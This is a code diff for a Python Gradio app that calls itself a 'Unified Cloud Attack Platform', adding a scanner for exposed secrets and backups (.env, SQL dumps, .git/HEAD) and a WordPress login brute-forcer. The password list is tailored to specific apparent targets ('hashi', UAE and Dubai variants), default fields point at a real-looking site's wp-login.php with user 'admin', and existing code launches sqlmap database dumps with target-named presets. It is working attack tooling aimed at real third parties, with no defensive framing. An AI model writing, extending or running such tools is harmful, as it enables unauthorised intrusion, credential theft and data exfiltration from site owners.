Update app.py

app.py

@@ -3,6 +3,11 @@ import subprocess
 import os
 import shutil
 from pathlib import Path
+import requests
+import re
+from concurrent.futures import ThreadPoolExecutor
+import time
+import random
 
 # --- Session Restoration Logic ---
 def restore_session():
@@ -102,6 +107,109 @@ def set_mysql_attack():
         "--dbms=MySQL --dump --force-ssl --random-agent --no-cast"
     )
 
+# --- Auto Hunter Logic (Merged) ---
+COMMON_PATHS = [
+    ".env", "wp-config.php.bak", "config.php.bak", "db.sql", "database.sql", "dump.sql", "backup.zip",
+    "admin/", "login/", "wp-admin/", "dashboard/", "panel/", "user/", "auth/", "phpinfo.php",
+    "robots.txt", "sitemap.xml", ".git/HEAD", ".vscode/sftp.json"
+]
+
+def auto_hunt(domain):
+    if not domain:
+        yield "❌ Enter a domain first."
+        return
+
+    domain = domain.replace("https://", "").replace("http://", "").strip("/")
+    base_url = f"https://{domain}"
+    
+    yield f"🚀 Launching Smart Auto-Hunter on {base_url}...\n"
+
+    def check_path(path):
+        url = f"{base_url}/{path}"
+        try:
+            r = requests.get(url, timeout=3, headers={"User-Agent": "Mozilla/5.0 (AutoHunter)"})
+            code = r.status_code
+            size = len(r.content)
+            
+            if code == 200:
+                if size < 500 and "do not exist" in r.text.lower():
+                    return None
+                return f"✅ FOUND: {url} (Size: {size})"
+            elif code == 403:
+                return f"🔒 FORBIDDEN: {url}"
+            return None
+        except:
+            return None
+
+    results = []
+    with ThreadPoolExecutor(max_workers=10) as executor:
+        futures = [executor.submit(check_path, p) for p in COMMON_PATHS]
+        for f in futures:
+            res = f.result()
+            if res:
+                results.append(res)
+                yield "\n".join(results)
+    
+    if not results:
+        yield "\n🤷 No standard vulnerabilities found."
+    else:
+        yield "\n🎉 HUNT COMPLETE!"
+
+# --- Brute Force Logic (Merged) ---
+PASSWORDS = [
+    "admin", "password", "123456", "hashi", "hashi123", "hashi2024", "hashi2025", "hashi.ae",
+    "admin123", "admin2024", "admin2025", "qwerty", "letmein", "master", "root",
+    "dragon", "superman", "welcome", "welcome1", "pass123", "love", "secret",
+    "hashi_admin", "admin_hashi", "dubai", "uae", "uae123", "abudhabi", "dubai123"
+]
+
+HEADERS = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
+}
+
+def brute_force(url, username, custom_list):
+    if not url or not username:
+        yield "❌ URL and Username required."
+        return
+
+    pass_list = PASSWORDS.copy()
+    if custom_list:
+        pass_list += [p.strip() for p in custom_list.split('\n') if p.strip()]
+    
+    yield f"🚀 STARTING PLAN E: BRUTE FORCE on {username}@{url}\n"
+    
+    session = requests.Session()
+    session.headers.update(HEADERS)
+
+    for pwd in pass_list:
+        try:
+            time.sleep(random.uniform(0.5, 1.5)) # Faster in cloud
+            data = {
+                "log": username, "pwd": pwd, "wp-submit": "Log In",
+                "redirect_to": f"{url}/wp-admin/", "testcookie": "1"
+            }
+            yield f"🔑 Testing: {pwd} ... "
+            
+            r = session.post(url, data=data, timeout=5, allow_redirects=True)
+            
+            if any(s in r.text for s in ["dashboard", "wp-admin", "Log Out", "Howdy"]):
+                yield "✅ SUCCESS! 🔓\n"
+                yield f"🎉 CREDENTIALS FOUND: {username}:{pwd}\n"
+                return
+            elif "incorrect_password" in r.text or "lost your password" in r.text:
+                yield "❌ Failed.\n"
+            elif "wp-admin" in r.url:
+                 yield "✅ SUCCESS (Redirect)! 🔓\n"
+                 yield f"🎉 CREDENTIALS FOUND: {username}:{pwd}\n"
+                 return
+            else:
+                yield "❌ Failed.\n"
+                
+        except Exception as e:
+            yield f"⚠️ Error: {str(e)}\n"
+
+    yield "\n💀 Wordlist Exhausted."
+
 # --- Dork Studio Logic ---
 def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_errors):
     dorks = []
@@ -128,13 +236,13 @@ def generate_dorks(domain, targeted_extensions, find_admin, find_files, find_err
 
     return "\n".join(dorks)
 
-with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo:
-    gr.Markdown("# 🌊 SLMP Cloud Runner v2.0 - Ultra Speed 🌩️")
-    gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth. Now includes Alpha Recon Studio.")
+with gr.Blocks() as demo:
+    gr.Markdown("# 🌊 GHOST RUNNER v2.1 (FIXED) 👻")
+    gr.Markdown("Unified Cloud Attack Platform: SQLMap + Auto-Hunter + Brute Force.")
     
     with gr.Tabs():
-        # TAB 1: ATTACK RUNNER
-        with gr.TabItem("⚔️ Attack Runner"):
+        # TAB 1: ATTACK RUNNER (SQLMap)
+        with gr.TabItem("⚔️ SQL Attack Runner"):
             with gr.Row():
                 with gr.Column(scale=2):
                     url_input = gr.Textbox(label="🎯 Target URL", placeholder="https://example.com/page.php?id=1")
@@ -162,9 +270,29 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
 
                 with gr.Column(scale=3):
                     output_log = gr.Code(label="📊 LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30)
+        
+        # TAB 2: AUTO HUNTER
+        with gr.TabItem("🤖 Auto-Hunter (Recon)"):
+            with gr.Row():
+                with gr.Column():
+                    t_domain = gr.Textbox(label="Target Domain", placeholder="younzee.com")
+                    btn_auto = gr.Button("🚀 START AUTO-SCAN", variant="primary")
+                with gr.Column():
+                    t_output = gr.Code(label="Live Results", language="markdown", lines=20)
+
+        # TAB 3: BRUTE FORCE (Plan E)
+        with gr.TabItem("🥊 Brute Force (Plan E)"):
+            with gr.Row():
+                with gr.Column():
+                    bf_url = gr.Textbox(label="Login URL", value="https://younzee.com/wp-login.php")
+                    bf_user = gr.Textbox(label="Username", value="admin")
+                    bf_pass = gr.Textbox(label="Custom Passwords", lines=5)
+                    btn_bf = gr.Button("🥊 LAUNCH ATTACK", variant="stop")
+                with gr.Column():
+                    bf_out = gr.Code(label="Brute Force Logs", language="markdown", lines=20)
 
-        # TAB 2: RECON STUDIO (Merged)
-        with gr.TabItem("🦅 Alpha Recon Studio"):
+        # TAB 4: RECON STUDIO (Legacy)
+        with gr.TabItem("🦅 Dork Studio"):
              with gr.Row():
                 with gr.Column():
                     domain_input = gr.Textbox(label="Target Domain", placeholder="example.com")
@@ -178,17 +306,22 @@ with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate"))
                     btn_gen = gr.Button("🔍 Generate Recon Dorks", variant="primary")
                 
                 with gr.Column():
-                    dork_output = gr.Code(label="Generated Dorks", language="text", lines=20)
+                    dork_output = gr.Textbox(label="Generated Dorks", lines=20)
 
-    # Event handlers Runner
+    # Event handlers
     btn_run.click(run_sqlmap,inputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input], outputs=output_log, queue=True)
     btn_hashi.click(set_hashi_victory, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input])
     btn_search.click(set_search_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input])
     btn_mysql.click(set_mysql_attack, outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input])
-
-    # Event handlers Recon
+    
+    btn_auto.click(auto_hunt, inputs=t_domain, outputs=t_output)
+    btn_bf.click(brute_force, inputs=[bf_url, bf_user, bf_pass], outputs=bf_out)
     btn_gen.click(generate_dorks, inputs=[domain_input, ext_input, check_admin, check_files, check_errors], outputs=dork_output)
 
 if __name__ == "__main__":
-    print("✨ SLMP Panel Live.")
-    demo.queue().launch(server_name="0.0.0.0", server_port=7860)
+    print("✨ Ghost Runner v2.1 Command Center Live.")
+    demo.queue().launch(
+        server_name="0.0.0.0", 
+        server_port=7860,
+        theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")
+    )